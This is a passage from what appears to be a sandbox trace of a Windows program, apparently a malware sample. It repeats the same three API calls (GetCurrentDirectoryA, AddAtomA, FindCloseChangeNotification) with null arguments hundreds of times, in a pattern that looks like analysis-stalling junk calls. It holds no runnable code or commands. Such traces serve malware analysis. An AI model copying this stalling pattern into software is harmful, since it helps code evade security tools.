lpBuffer="Module32FirstW") returned 0x26 [0080.581] AddAtomA (lpString=0x0) returned 0x0 [0080.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.581] AddAtomA (lpString=0x0) returned 0x0 [0080.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.582] AddAtomA (lpString=0x0) returned 0x0 [0080.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.582] AddAtomA (lpString=0x0) returned 0x0 [0080.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.583] AddAtomA (lpString=0x0) returned 0x0 [0080.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.583] AddAtomA (lpString=0x0) returned 0x0 [0080.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.583] AddAtomA (lpString=0x0) returned 0x0 [0080.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.584] AddAtomA (lpString=0x0) returned 0x0 [0080.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.584] AddAtomA (lpString=0x0) returned 0x0 [0080.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.584] AddAtomA (lpString=0x0) returned 0x0 [0080.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.584] AddAtomA (lpString=0x0) returned 0x0 [0080.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.584] AddAtomA (lpString=0x0) returned 0x0 [0080.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.585] AddAtomA (lpString=0x0) returned 0x0 [0080.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.585] AddAtomA (lpString=0x0) returned 0x0 [0080.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.585] AddAtomA (lpString=0x0) returned 0x0 [0080.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.585] AddAtomA (lpString=0x0) returned 0x0 [0080.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.586] AddAtomA (lpString=0x0) returned 0x0 [0080.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.586] AddAtomA (lpString=0x0) returned 0x0 [0080.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.586] AddAtomA (lpString=0x0) returned 0x0 [0080.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.587] AddAtomA (lpString=0x0) returned 0x0 [0080.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.587] AddAtomA (lpString=0x0) returned 0x0 [0080.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.587] AddAtomA (lpString=0x0) returned 0x0 [0080.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.587] AddAtomA (lpString=0x0) returned 0x0 [0080.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.588] AddAtomA (lpString=0x0) returned 0x0 [0080.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.588] AddAtomA (lpString=0x0) returned 0x0 [0080.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.588] AddAtomA (lpString=0x0) returned 0x0 [0080.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.588] AddAtomA (lpString=0x0) returned 0x0 [0080.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.589] AddAtomA (lpString=0x0) returned 0x0 [0080.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.589] AddAtomA (lpString=0x0) returned 0x0 [0080.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.589] AddAtomA (lpString=0x0) returned 0x0 [0080.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.589] AddAtomA (lpString=0x0) returned 0x0 [0080.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.590] AddAtomA (lpString=0x0) returned 0x0 [0080.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.590] AddAtomA (lpString=0x0) returned 0x0 [0080.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.590] AddAtomA (lpString=0x0) returned 0x0 [0080.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.590] AddAtomA (lpString=0x0) returned 0x0 [0080.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.590] AddAtomA (lpString=0x0) returned 0x0 [0080.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.591] AddAtomA (lpString=0x0) returned 0x0 [0080.591] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.591] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.591] AddAtomA (lpString=0x0) returned 0x0 [0080.591] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.591] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.591] AddAtomA (lpString=0x0) returned 0x0 [0080.591] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.591] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.591] AddAtomA (lpString=0x0) returned 0x0 [0080.592] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.592] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.592] AddAtomA (lpString=0x0) returned 0x0 [0080.592] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.592] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.592] AddAtomA (lpString=0x0) returned 0x0 [0080.592] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.592] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.592] AddAtomA (lpString=0x0) returned 0x0 [0080.592] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.592] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.592] AddAtomA (lpString=0x0) returned 0x0 [0080.592] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.592] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.592] AddAtomA (lpString=0x0) returned 0x0 [0080.592] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.593] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.593] AddAtomA (lpString=0x0) returned 0x0 [0080.593] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.593] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.593] AddAtomA (lpString=0x0) returned 0x0 [0080.593] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.593] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.593] AddAtomA (lpString=0x0) returned 0x0 [0080.593] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.593] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.593] AddAtomA (lpString=0x0) returned 0x0 [0080.593] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.593] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.593] AddAtomA (lpString=0x0) returned 0x0 [0080.593] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.593] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.594] AddAtomA (lpString=0x0) returned 0x0 [0080.594] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.594] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.594] AddAtomA (lpString=0x0) returned 0x0 [0080.594] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.594] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.594] AddAtomA (lpString=0x0) returned 0x0 [0080.594] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.594] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.594] AddAtomA (lpString=0x0) returned 0x0 [0080.594] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.595] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.595] AddAtomA (lpString=0x0) returned 0x0 [0080.595] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.595] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.595] AddAtomA (lpString=0x0) returned 0x0 [0080.595] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.595] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.595] AddAtomA (lpString=0x0) returned 0x0 [0080.595] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.595] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.595] AddAtomA (lpString=0x0) returned 0x0 [0080.595] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.596] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.596] AddAtomA (lpString=0x0) returned 0x0 [0080.596] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.596] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.596] AddAtomA (lpString=0x0) returned 0x0 [0080.596] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.596] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.596] AddAtomA (lpString=0x0) returned 0x0 [0080.596] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.596] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.596] AddAtomA (lpString=0x0) returned 0x0 [0080.596] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.596] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.596] AddAtomA (lpString=0x0) returned 0x0 [0080.596] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.597] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.597] AddAtomA (lpString=0x0) returned 0x0 [0080.597] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.597] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.597] AddAtomA (lpString=0x0) returned 0x0 [0080.597] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.597] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.597] AddAtomA (lpString=0x0) returned 0x0 [0080.597] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.597] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.597] AddAtomA (lpString=0x0) returned 0x0 [0080.597] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.597] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.597] AddAtomA (lpString=0x0) returned 0x0 [0080.597] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.598] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.598] AddAtomA (lpString=0x0) returned 0x0 [0080.598] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.598] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.598] AddAtomA (lpString=0x0) returned 0x0 [0080.598] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.598] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.598] AddAtomA (lpString=0x0) returned 0x0 [0080.598] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.610] AddAtomA (lpString=0x0) returned 0x0 [0080.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.610] AddAtomA (lpString=0x0) returned 0x0 [0080.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.610] AddAtomA (lpString=0x0) returned 0x0 [0080.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.610] AddAtomA (lpString=0x0) returned 0x0 [0080.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.611] AddAtomA (lpString=0x0) returned 0x0 [0080.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.611] AddAtomA (lpString=0x0) returned 0x0 [0080.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.611] AddAtomA (lpString=0x0) returned 0x0 [0080.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.611] AddAtomA (lpString=0x0) returned 0x0 [0080.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.612] AddAtomA (lpString=0x0) returned 0x0 [0080.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.612] AddAtomA (lpString=0x0) returned 0x0 [0080.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.612] AddAtomA (lpString=0x0) returned 0x0 [0080.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.612] AddAtomA (lpString=0x0) returned 0x0 [0080.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.612] AddAtomA (lpString=0x0) returned 0x0 [0080.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.613] AddAtomA (lpString=0x0) returned 0x0 [0080.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.613] AddAtomA (lpString=0x0) returned 0x0 [0080.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.614] AddAtomA (lpString=0x0) returned 0x0 [0080.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.614] AddAtomA (lpString=0x0) returned 0x0 [0080.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.614] AddAtomA (lpString=0x0) returned 0x0 [0080.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.615] AddAtomA (lpString=0x0) returned 0x0 [0080.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.615] AddAtomA (lpString=0x0) returned 0x0 [0080.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.615] AddAtomA (lpString=0x0) returned 0x0 [0080.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.615] AddAtomA (lpString=0x0) returned 0x0 [0080.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.616] AddAtomA (lpString=0x0) returned 0x0 [0080.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.616] AddAtomA (lpString=0x0) returned 0x0 [0080.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.616] AddAtomA (lpString=0x0) returned 0x0 [0080.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.616] AddAtomA (lpString=0x0) returned 0x0 [0080.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.617] AddAtomA (lpString=0x0) returned 0x0 [0080.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.617] AddAtomA (lpString=0x0) returned 0x0 [0080.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.617] AddAtomA (lpString=0x0) returned 0x0 [0080.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.617] AddAtomA (lpString=0x0) returned 0x0 [0080.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.617] AddAtomA (lpString=0x0) returned 0x0 [0080.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.618] AddAtomA (lpString=0x0) returned 0x0 [0080.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.618] AddAtomA (lpString=0x0) returned 0x0 [0080.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.618] AddAtomA (lpString=0x0) returned 0x0 [0080.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.618] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.618] AddAtomA (lpString=0x0) returned 0x0 [0080.618] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.619] AddAtomA (lpString=0x0) returned 0x0 [0080.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.619] AddAtomA (lpString=0x0) returned 0x0 [0080.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.619] AddAtomA (lpString=0x0) returned 0x0 [0080.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.619] AddAtomA (lpString=0x0) returned 0x0 [0080.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.619] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.619] AddAtomA (lpString=0x0) returned 0x0 [0080.619] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.620] AddAtomA (lpString=0x0) returned 0x0 [0080.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.620] GetCurrentDirectoryA (in: nBufferLength=0x0, 